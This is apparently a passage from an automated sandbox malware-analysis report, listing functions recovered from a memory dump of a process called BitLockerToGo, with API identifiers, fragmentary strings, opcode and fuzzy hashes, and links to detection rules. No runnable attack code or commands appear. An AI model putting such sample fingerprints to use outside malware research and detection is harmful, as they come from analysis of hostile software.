                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f8bf7594880540893e588c0e7e71e778f46c810e84ffe6c34b5c7349b40fdcb5
                                                                                                                                                                  • Instruction ID: 801f4cfc8fe2b32f3a4226c882eb37a2ac534de883692f7c9abe96bfda29232d
                                                                                                                                                                  • Opcode Fuzzy Hash: f8bf7594880540893e588c0e7e71e778f46c810e84ffe6c34b5c7349b40fdcb5
                                                                                                                                                                  • Instruction Fuzzy Hash: C1F0E5B2A046501FDF3289949CC0F3BBB9CCBCB228F1A1865E88757202E2619C40C3E6
                                                                                                                                                                  Function 02D019D9 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8c60195500c2cbe964d8ff92ffcdc615068a7c6dd94760675cb862beec79c2ce
                                                                                                                                                                  • Instruction ID: 4e058ef68ad2f9834f934cb506bb30886335b8dfc4df53278790a43dfbdcdda7
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c60195500c2cbe964d8ff92ffcdc615068a7c6dd94760675cb862beec79c2ce
                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF0122480C2D1CDE7178F27D0D0771BFA1AB13385B1851CAD8DA5B3A3C325D84AC765
                                                                                                                                                                  Function 02D10670 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                  • Instruction ID: b44a3cead7cbc87f6696e0ef917a42a5847532d880797ebb12fa68d241e52f00
                                                                                                                                                                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                  • Instruction Fuzzy Hash: ACD0A7216083715BAF789E19B400977F7F0EAC7A12F49955FF982E3248E730DC81C2A9
                                                                                                                                                                  Function 02D15EC4 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ab39ec4045443febfa1909a9f66a6e6478b5b343ae8fc0d9f4f731ed3d0c77df
                                                                                                                                                                  • Instruction ID: 993b8a16dc59a34cc4ce071cb82f539b541aafd7aeaec185c22e71338d8867a3
                                                                                                                                                                  • Opcode Fuzzy Hash: ab39ec4045443febfa1909a9f66a6e6478b5b343ae8fc0d9f4f731ed3d0c77df
                                                                                                                                                                  • Instruction Fuzzy Hash: 74D05EB5C4C240EBD2949E10A0A10B673B8E666216F0028E5E08653701D239DCAADB26
                                                                                                                                                                  Function 02D1640A Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3ecf3634c20fe775d5a5f5cfacaed08ec8e01f3190085d3e9bf92c99c6cd0f27
                                                                                                                                                                  • Instruction ID: 4f3b48220d77f1bd55e764897dd7ab8029a5fc04c793c00e30cb5b06f1e799fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ecf3634c20fe775d5a5f5cfacaed08ec8e01f3190085d3e9bf92c99c6cd0f27
                                                                                                                                                                  • Instruction Fuzzy Hash: B3D05E3040C31685C7148F04D062677B3B4EF83685F042809E0C21BA28F378C984D38A
                                                                                                                                                                  Function 02D04681 Relevance: 64.9, APIs: 1, Strings: 36, Instructions: 130memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                  • String ID: !$#$'$1$3$5$7$9$;$=$?$@$K$M$T$X$[$a$a$b$b$c$c$e$g$h$i$k$m$n$o$r$t$y$}$}
                                                                                                                                                                  • API String ID: 2525500382-110656264
                                                                                                                                                                  • Opcode ID: 9f4f747b9bed2833e2138b0fbf7d125e87ad64622abd9a0cdc60b35083dea185
                                                                                                                                                                  • Instruction ID: 24e045ebd21fe7e6229d9d6cdeb17a6a7c6baf544e90d145fa4ef2a0d8031a16
                                                                                                                                                                  • Opcode Fuzzy Hash: 9f4f747b9bed2833e2138b0fbf7d125e87ad64622abd9a0cdc60b35083dea185
                                                                                                                                                                  • Instruction Fuzzy Hash: B5818F7050CBC1CAD332C62898987DBBFE16BE6319F480A9DD4D94A3D2C3BA4549C763
                                                                                                                                                                  Function 02D056DE Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 68COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                                  • String ID: !$#$%$'$*$+$9$=$?
                                                                                                                                                                  • API String ID: 1927566239-1641786196
                                                                                                                                                                  • Opcode ID: f1820f9d7f7bbd8f74cb6fee9e1ad12efceb538f00a1913f2c14719095c60bf0
                                                                                                                                                                  • Instruction ID: adaee8f6787bc227ae3be91b1e25a05db32f9ee3aa9111393aeefc4bcd0f2ebb
                                                                                                                                                                  • Opcode Fuzzy Hash: f1820f9d7f7bbd8f74cb6fee9e1ad12efceb538f00a1913f2c14719095c60bf0
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31FF7100C3C58ED336DB2890997DBBBE0AB96304F044D9DE6E887382C7759609CBA3
                                                                                                                                                                  Function 02D049CA Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 89COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                  • String ID: `$j$k$l$l$q$}
                                                                                                                                                                  • API String ID: 2610073882-1688293196
                                                                                                                                                                  • Opcode ID: 0cc297f45a4010299df5b25b46e71c3130874fa31922f32f071c35d34307850f
                                                                                                                                                                  • Instruction ID: eb95c3b5c36452ff35d06d1a6ed358bc7dcbedaaed1a352d91bae2958d2be299
                                                                                                                                                                  • Opcode Fuzzy Hash: 0cc297f45a4010299df5b25b46e71c3130874fa31922f32f071c35d34307850f
                                                                                                                                                                  • Instruction Fuzzy Hash: C751F66010D7C1CEE331DB788458B8EBFE0AB96224F044A9DE5E95B3D2D3755445CB63
                                                                                                                                                                  Function 02D04120 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 84COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                  • String ID: "$4$m$u$~
                                                                                                                                                                  • API String ID: 2610073882-2914945269
                                                                                                                                                                  • Opcode ID: cf1a23fbd6133853c4b1c3ef88b8a37c778b55b624e907657c966e9ea95358b0
                                                                                                                                                                  • Instruction ID: 18cc3d6b7213e6196e307f0892e38d36eac78e6258ac9649fa4700e226ea3357
                                                                                                                                                                  • Opcode Fuzzy Hash: cf1a23fbd6133853c4b1c3ef88b8a37c778b55b624e907657c966e9ea95358b0
                                                                                                                                                                  • Instruction Fuzzy Hash: 0041B37054C7C2CED331DA288448B9EBFE0ABA6224F048E6DE5E9472D2D7755445DB23
                                                                                                                                                                  Function 02D051D3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String
                                                                                                                                                                  • String ID: /$8$?
                                                                                                                                                                  • API String ID: 2568140703-3340046098
                                                                                                                                                                  • Opcode ID: 9658e37aa3b603d222914f39b439ec998b58d3df81c9c56d0a746c23f0eff88c
                                                                                                                                                                  • Instruction ID: fce7e79c933e0a7053a09b0875895c3206e061be47f894307cb72c81ff427a9e
                                                                                                                                                                  • Opcode Fuzzy Hash: 9658e37aa3b603d222914f39b439ec998b58d3df81c9c56d0a746c23f0eff88c
                                                                                                                                                                  • Instruction Fuzzy Hash: 32712B716083818BC3359F28D4907AEBBE2BFC9314F598A2DD5D98B3D1CB759806CB52
                                                                                                                                                                  Function 02D0E1F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: :
                                                                                                                                                                  • API String ID: 0-336475711
                                                                                                                                                                  • Opcode ID: 5685a2589d36cec9d8e6226ce7a62f863a457931d9f86a5912853f19da67ac39
                                                                                                                                                                  • Instruction ID: 9af98b13a12d1ca4b0350496bc2d9eef2df5def9825f548bd7667ed66bdc28b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 5685a2589d36cec9d8e6226ce7a62f863a457931d9f86a5912853f19da67ac39
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C3137B0598340EBE3208F11D859B4BBBF4FB8A399F404D0CF5C85A391D7B59859CB96